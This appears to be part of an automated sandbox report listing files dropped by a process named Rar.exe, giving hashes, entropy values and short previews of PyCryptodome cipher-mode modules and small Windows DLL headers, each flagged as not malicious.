                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1267
                                                                                                                                                                                                                                  Entropy (8bit):4.510576229003074
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1RM7CRDQlT30xA949nRNne3yFnR3Fne3UPtWYn90E+5Q:ccQlARNvesLeJYnaEv
                                                                                                                                                                                                                                  MD5:76916331AA1417BD4EADDD10948D8D26
                                                                                                                                                                                                                                  SHA1:1223CEC2D805BE11A585A842EDA6B0214F1AB3E3
                                                                                                                                                                                                                                  SHA-256:E0C136E3762DD93C24793DAF989D94061AF30A300D7308BC8AD2EF69E73A92E5
                                                                                                                                                                                                                                  SHA-512:BABD83C1F0D4399B0B2FB099B8303303694763104B75C56C64CAD8C0A722B7F3FEE5FA0EA11026857E5822853D73905B45AA83EF4DAC23D8DD56A6EF41C73621
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from types import ModuleType..from typing import Union, Any, Optional, Tuple, Dict, overload....Buffer = Union[bytes, bytearray, memoryview]....class OcbMode(object):.. block_size: int.. nonce: Buffer.... def __init__(self,.. factory: ModuleType,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> OcbMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None:
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10491
                                                                                                                                                                                                                                  Entropy (8bit):4.4882632072003945
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:dLFQHvoPoxH4dILt52ALFxKiDqwG4rW9ytU4p2EVQ577BqotU4SputAVsqW1mYhH:d5QHv/pwADKKqO6+U46Q2U4c3amgQO
                                                                                                                                                                                                                                  MD5:EADCECA62EE60C2F04D2E18ADB5FB72C
                                                                                                                                                                                                                                  SHA1:3A40BCD84E318E1641DFFDFCF7509957DD75A997
                                                                                                                                                                                                                                  SHA-256:670B77041005E3E61FA2E3A80E23E454051039FE3F310C8B53A7A8F02A56B986
                                                                                                                                                                                                                                  SHA-512:E347FD33F158E656F5F60499D25C18B7121896190B3F4CB935F3253433CFCB038E3B46D591E203F0EF78F8F99D91D76F2FF34D2831360D199AE0E1B148F0AC65
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Cipher/mode_ofb.py : OFB mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):716
                                                                                                                                                                                                                                  Entropy (8bit):4.736539689518066
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:1REYBw1+sJal9lvIY3FDXHo2JRyU1AOlSFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REP+LjT3pHo2NAY4nRNne3yFnR3FneM
                                                                                                                                                                                                                                  MD5:AFB364F0C9ADDDBA29076577257DFC52
                                                                                                                                                                                                                                  SHA1:208940A0B5304122118AD8E33CB8B8AF35228146
                                                                                                                                                                                                                                  SHA-256:C3F9CFE344BE5B88677256A584AC428D271A23B45E856A77165844787980B63F
                                                                                                                                                                                                                                  SHA-512:00A6D68651C4AE8D159E15F6617421322764CBE06307D9E454A96FBEE925F37BB567A2365416B9C2F4A1FE3AD03185750AB65B8B6BD08878446C8368508D45F8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['OfbMode']....class OfbMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.. .. def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7259
                                                                                                                                                                                                                                  Entropy (8bit):4.832276328481339
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/Itv4RK0tUU4cp/6U41k2T:0rskrs9Vq0J0tUTccT7
                                                                                                                                                                                                                                  MD5:A64ED188605DD3505B7F51513EC9397D
                                                                                                                                                                                                                                  SHA1:38198DDFB53F1C410999AC0622F27328F7EB3D85
                                                                                                                                                                                                                                  SHA-256:3F71E4528BD24F3CC96BDEA89BC1CAC2FE69FC198C4DB07BFD0A1C997827FAE4
                                                                                                                                                                                                                                  SHA-512:0559C532F2D2B5DF2994AA16C0204C2AC27283B5540530BD1F069BC46A4C1F6A5E8142976DF29AC112B7F24E49200EA2DCF7C0C3BB1E537B559E2D616D148732
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):576
                                                                                                                                                                                                                                  Entropy (8bit):4.621504702467695
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:1Ro8s7REYB6IvIY3FDUCpu8RypqIY3fmIY3fm1Ap/ILFq6R5wnFq6R5j:1RM7C8T3SCpTB3632A9KnReFnRN
                                                                                                                                                                                                                                  MD5:C1EADE4DE0796F8C003DBB655E410274
                                                                                                                                                                                                                                  SHA1:283080AEFA8D7F00772CE108277688D55519EF46
                                                                                                                                                                                                                                  SHA-256:5E1521B1EA98D146374597A94FF5DF82FBE49F7C3DC06F6DB03379E1EA79D7E5
                                                                                                                                                                                                                                  SHA-512:3D2601FFBB3EC84FDEF28FBF4F409CBBF60D220B394D256FD13728EF5F0CC587FC2EDB00C868C10EEF7E0303508949D79DC23F3998E5CE2D4942A2A625BFC676
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from types import ModuleType..from typing import Union, Dict....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['OpenPgpMode']....class OpenPgpMode(object):.. block_size: int.. iv: Union[bytes, bytearray, memoryview].. IV: Union[bytes, bytearray, memoryview].. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. iv: Buffer,.. cipher_params: Dict) -> None: ..... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, plaintext: Buffer) -> bytes: .......
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14369
                                                                                                                                                                                                                                  Entropy (8bit):4.787903135099736
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/IK31IzSsGJ+KLk3eNVkrEPHAZsLzL64giVRWcuL4oozDTo0Bk+Y:0rskrs9Vqp1pXNVkrEPH6MXWiXWWtDUX
                                                                                                                                                                                                                                  MD5:ED410BD9244F81EE63DE5883EA85F821
                                                                                                                                                                                                                                  SHA1:2C04FA9C2F06F167CC5411C41A925F9E56337ABB
                                                                                                                                                                                                                                  SHA-256:BEB9B03EE0819457C449970767BC7FE3F671A385BED8B7C018BBD3EDD2F9C45D
                                                                                                                                                                                                                                  SHA-512:57081239F77B97D2EF811207B0F29518D9C44E216A529F59B17726B7E378853E0E771E2120C8EBC759A323A4AEED330E3DB3A291FE25F523AC5D782431003CD2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1299
                                                                                                                                                                                                                                  Entropy (8bit):4.379657025743841
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1RM7ClDTglT3RzEA9unReFnR7PtWLn8no0E+XW3oIQ:cSklORuWLn8nlEF49
                                                                                                                                                                                                                                  MD5:FB584A8E53BC1B138B3932BDF16901D5
                                                                                                                                                                                                                                  SHA1:CF4F2426C15F17BD613A304B3E7F19A181E2035E
                                                                                                                                                                                                                                  SHA-256:80DAE2A187B04F2E3729BCDF78DE0DB31E22CA0922AD420F65077C448F1538E5
                                                                                                                                                                                                                                  SHA-512:05D214D0B39CA5566EA833772207D823AF350AEDDAF4A76C9569024D2A374D48FC48A0729B226A1A934E7CA179A5130ABB4232D3412BA27C9DA3DB214A9358BA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from types import ModuleType..from typing import Union, Tuple, Dict, Optional, overload....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['SivMode']....class SivMode(object):.. block_size: int.. nonce: bytes.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. kwargs: Dict) -> None: ..... .. def update(self, component: Buffer) -> SivMode: ....... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, plaintext: Buffer) -> bytes: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ....... @overload.. def encrypt_and_digest(self,.. plaintext: Buffer) -> Tuple[bytes, bytes]: ..... @overload.. def encrypt_and_digest(self,.. plaintext: Buffer,..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10752
                                                                                                                                                                                                                                  Entropy (8bit):5.484733570503228
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:oYm4tvPEiNpcTJWctWJjpjOdQqsofxWuWMVnhUNH:BNpcn4JVjcdsIrnh+
                                                                                                                                                                                                                                  MD5:B706A2C68D968D3DEBABB2032974A2D8
                                                                                                                                                                                                                                  SHA1:99EF37D64024D73FE6460BE6F358C5AC3171A4E2
                                                                                                                                                                                                                                  SHA-256:D23FC438498AFFB3C31BFE0E2BDA167D442D56F59D1AD86A52862E437B2E3B7A
                                                                                                                                                                                                                                  SHA-512:0CD9DF22203128060DED8CE7545B7387A89A3F9A840D3CFD17965339366FC6343936C5A62C0C86BAB9C300CF7126443E260F0DFCAD871A6C10E749F733030583
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'..co..co..co..j.!.go..v...ao..(...`o..co..@o..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.M.bo..Y..bo..Richco..................PE..L...7..e...........!...%............N........0...............................p............@..........................5.......5..d....P.......................`..h...x1...............................0..@............0..|............................text............................... ..`.rdata.......0......................@..@.data........@.......$..............@....rsrc........P.......&..............@..@.reloc..h....`.......(..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1865
                                                                                                                                                                                                                                  Entropy (8bit):3.3643263236552166
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1+PdPq4/seQpoe/HMaDOP4PTpegUgygBVEp5KC:gPdF/szoG6+hBVEmC
                                                                                                                                                                                                                                  MD5:F93AE45150224E27A0198060D999FF3F
                                                                                                                                                                                                                                  SHA1:25CA8C5737157BED998870A4C5F2A53392FE4298
                                                                                                                                                                                                                                  SHA-256:9F8950FEEB6BE54C20FE83B79D18B33C773591E4BFD2F6ED85865E4E12677616
                                                                                                                                                                                                                                  SHA-512:CA4D755B859FBDDA17F5B498A2B6A718FCB452D3AD71715D84707B5D3EFFE383FCB1AD23E2CE34387ABD390825135C18AD2152B35AA23FD0717660AD63F4C1C3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from Crypto.Util._raw_api import (load_pycryptodome_raw_lib, c_size_t,.. c_uint8_ptr)......_raw_pkcs1_decode = load_pycryptodome_raw_lib("Crypto.Cipher._pkcs1_decode",.. """.. int pkcs1_decode(const uint8_t *em, size_t len_em,.. const uint8_t *sentinel, size_t len_sentinel,.. size_t expected_pt_len,.. uint8_t *output);.... int oaep_decode(const uint8_t *em,.. size_t em_len,.. const uint8_t *lHash,.. size_t hLen,.. const uint8_t *db,.. size_t db_len);.. """)......def pkcs1_decode(em, sentinel, expected_pt_len, output):.. if len(em) != len(output):..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):30720
                                                                                                                                                                                                                                  Entropy (8bit):6.9032080362564345
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:M2BEH4JVkEnBj+QbWauyC7aUARtVCpeiO2mLIPKDkGuF0U3d0QOo8VdbKBWmu6nL:rW4FbWauyUARtVn2m8S4j9d0th9Vkb+
                                                                                                                                                                                                                                  MD5:A37E15DDFA1524FE9C504A1D55C23559
                                                                                                                                                                                                                                  SHA1:010CF9919E4A5740727F97A669A4A48AA1C02535
                                                                                                                                                                                                                                  SHA-256:627D3E576E266183380510BB3E2BED66BBA719A6F8DB6352E4A7888AE46C72CE
                                                                                                                                                                                                                                  SHA-512:F93D09CEA003960007811DD60D129CA65118DF19A5DE9DC38960A16FF51062288D80BF47F2130904EF50CED4ED493E5C1A0569C63B3DF0E8D596CF94675A03B0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'..co..co..co..j.?.go..v...ao..(...`o..co..Bo..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.S.bo..Y..bo..Richco..................PE..L...5..e...........!...%.8...>......N........P............................................@..........................}.......}..d...............................t....y...............................x..@............P..t............................text....6.......8.................. ..`.rdata...0...P...2...<..............@..@.data................n..............@....rsrc................p..............@..@.reloc..t............r..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12800
                                                                                                                                                                                                                                  Entropy (8bit):5.762397320029445
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:dcEyRUaJ3jGrb3EKgjjWMUjvFiwGeOIVapq5n6jYUz:dTaGEK0PIvkwGMVsqR6jYUz
                                                                                                                                                                                                                                  MD5:6AB9193AB53A28C1893E80CBF5102ED7
                                                                                                                                                                                                                                  SHA1:4AA6B668B234BFD7A846B83566AC7112C924095E
                                                                                                                                                                                                                                  SHA-256:67642FEF35FD3764888D9302148CAD0C389AE794D1B0BA0633EEACEEB48A557F
                                                                                                                                                                                                                                  SHA-512:914ACB9C821967341CF9B55860BC094FB75FFAEC24DA3EC0F2DD62BE1907E4C205553E262E247DD0CFBD0DA7D2493127960754FE72242C699E6A5F7DB3D30EC9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'..co..co..co..j.).go..v...ao..(...`o..co..Go..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.E.bo..Y..bo..Richco..........................PE..L...5..e...........!...%............N........0...............................p............@..........................5.......5..d....P.......................`......x1...............................0..@............0...............................text............................... ..`.rdata..(....0......."..............@..@.data...|....@.......,..............@....rsrc........P......................@..@.reloc.......`.......0..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14848
                                                                                                                                                                                                                                  Entropy (8bit):6.06959711583454
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:iK9AcPEzVQOBWsNWJVkYPyihjOSdkkZTmoCqIZ0u0BwWkM+pQMVng8N4:igWVQOYJGUjto15pbngm
                                                                                                                                                                                                                                  MD5:A332271C53E041B9B892B60AD8DA8830
                                                                                                                                                                                                                                  SHA1:97E1ABC3C89477F46E74CD3F3B5815452DAA3CED
                                                                                                                                                                                                                                  SHA-256:C1ADDB480CB90A9D8A2F5F73BC8EBCB3FD9D5BF8EE72D4F63D5DF759DE7733D5
                                                                                                                                                                                                                                  SHA-512:1418851A0FE0E86F8118B2928369FE59C96FAEB702234F0674CDBB5D9A83706BF4238ED1AF68C507C72ED62628F899B0086D1D9DF5DA8A31B5DB2A8F0946DD56
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...co..co..co..j.=.go..v...ao..(...`o..co..Ao..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.Q.bo..Y..bo..Richco..........................PE..L...6..e...........!...%.&..........N........@............................................@..........................F.......F..d....`.......................p..h...pB...............................A..@............@..x............................text....%.......&.................. ..`.rdata.......@.......*..............@..@.data........P.......4..............@....rsrc........`.......6..............@..@.reloc..h....p.......8..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15872
                                                                                                                                                                                                                                  Entropy (8bit):6.494825200863079
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:apWVguoJGkjxwevIber6MzpJgLa0Mp8ingu:uOooWwmIbk6MXgLa1Ngu
                                                                                                                                                                                                                                  MD5:08A86CD45DA8764652261557F683BF2B
                                                                                                                                                                                                                                  SHA1:978152B4C470499DC40653F9A3543403EBA8673D
                                                                                                                                                                                                                                  SHA-256:37F946698ACCD3BBD777F791420765B079D634EE21749ED8239C963CE4857ED1
                                                                                                                                                                                                                                  SHA-512:E924037488FB568FD24064CDC9DD6EF7D6DF70FDF557CB12FBFDFB6D348F44DA52CC1BD551A56DB9BA4D0B49C085246A68B2CBBCC73087D557A4946EABCDD401
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...co..co..co..j.=.go..v...ao..(...`o..co..Ao..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.Q.bo..Y..bo..Richco..........................PE..L...6..e...........!...%....."......N........0............................................@.........................@E.......E..d....`.......................p.......A...............................@..@............0..x............................text...#........................... ..`.rdata..H....0......................@..@.data........P.......8..............@....rsrc........`.......:..............@..@.reloc.......p.......<..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22016
                                                                                                                                                                                                                                  Entropy (8bit):6.926890977760638
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:/QVvJVjZbuQLnpXB0C5ZXmrfXA+UA10ol31tuXSngb:/qvVuspx0CLXmrXA+NNxWMgb
                                                                                                                                                                                                                                  MD5:47E50117EC9091C856FC542D03ED73B5
                                                                                                                                                                                                                                  SHA1:3DFF4B70A74BCA801EC39E0B90BA0DDC764BB43A
                                                                                                                                                                                                                                  SHA-256:61B97957C93FC40AB9C7BDBEACA19FBD4D0EEA25ECE9A71447B6613663FC7037
                                                                                                                                                                                                                                  SHA-512:3C83924C5216FFD5353BAD3F4D1A1CD098E154B476A5AA9270A6D4D9F5C5E32F61DA0FD1F75FBB13D743A3D7FAEB7FC1106DEA413D41D154FA720B3AF9BD6015
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...co..co..co..j.=.go..v...ao..(...`o..co..Ao..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.Q.bo..Y..bo..Richco..........................PE..L...6..e...........!...%. ...4......K........0............................................@..........................U.......U..d....p..............................pQ...............................P..@............0..x............................text............ .................. ..`.rdata...(...0...*...$..............@..@.data........`.......N..............@....rsrc........p.......P..............@..@.reloc...............R..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                                                  Entropy (8bit):5.171425485428604
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:vsWqcdPErNKELV/Q1+2BWcMY5WJmzQ/5jO3h1PA72irMmGffzcATXdKj:BqcdPEXpATBWcNWJmI5jO0MVnAINKj
                                                                                                                                                                                                                                  MD5:F2E41F7FA11EAD634DC262A6EDDD19E8
                                                                                                                                                                                                                                  SHA1:64017A83607BD8FAD9047160FBF362C484F994DF
                                                                                                                                                                                                                                  SHA-256:B6D80A0833306F7182F6D73059E7340BBF7879F5B515194EC4FF59D423557A7D
                                                                                                                                                                                                                                  SHA-512:086F0E68B401DEF52D1D6F2CE1F84481C61A003F82C80BE04A207754D4ABEB13B9E4EB714A949009280C2D6F3FDE10CA835A88B3B8DBA3597780FBF3E378A870
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...co..co..co..j.=.go..v...ao..(...`o..co..Ao..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.Q.bo..Y..bo..Richco..........................PE..L...8..e...........!...%............N........0...............................p............@..........................5.......5..d....P.......................`..T...p1...............................0..@............0..x............................text............................... ..`.rdata.. ....0......................@..@.data........@....... ..............@....rsrc........P......."..............@..@.reloc..T....`.......$..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10240
                                                                                                                                                                                                                                  Entropy (8bit):5.558555109421982
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:cQ7MPEIUyRgWczWJ9vaqLjOUxc0kBpoOn4xJMVnk+HZN:r2Uyy6JRBLjVKYA4xgnk+HD
                                                                                                                                                                                                                                  MD5:40DA301B2DBB903A6D0F269E02B74C01
                                                                                                                                                                                                                                  SHA1:F21E443AABEE71F24247939BD2FACD73A1281EA5
                                                                                                                                                                                                                                  SHA-256:1D6A5CA1CFB202B6588FE34461A53AC07EF3DC1D3883A44F989F70E44A19B9B1
                                                                                                                                                                                                                                  SHA-512:98B73ED15CE74F8A5C8AC4CBCC090AFE4F769F8E5C37AA47B2728D08F376AE206507FBF78B84653B90A6C3CA81CCB533FA2EBB298148501EB65F72B53CBDAAB3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'..co..co..co..j.).go..v...ao..(...`o..co..Go..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.E.bo..Y..bo..Richco..........................PE..L...8..e...........!...%............N........0...............................p............@..........................5.......5..d....P.......................`..p...x1...............................0..@............0...............................text............................... ..`.rdata..>....0......................@..@.data........@......."..............@....rsrc........P.......$..............@..@.reloc..p....`.......&..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11776
                                                                                                                                                                                                                                  Entropy (8bit):5.519606577195779
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:NaA1PEFQRUzaWctWJjxjO38mQK7ZG2QVXf5nMVnpF1K+TN:NYQRUK4JNjEE2Q15WnpF0y
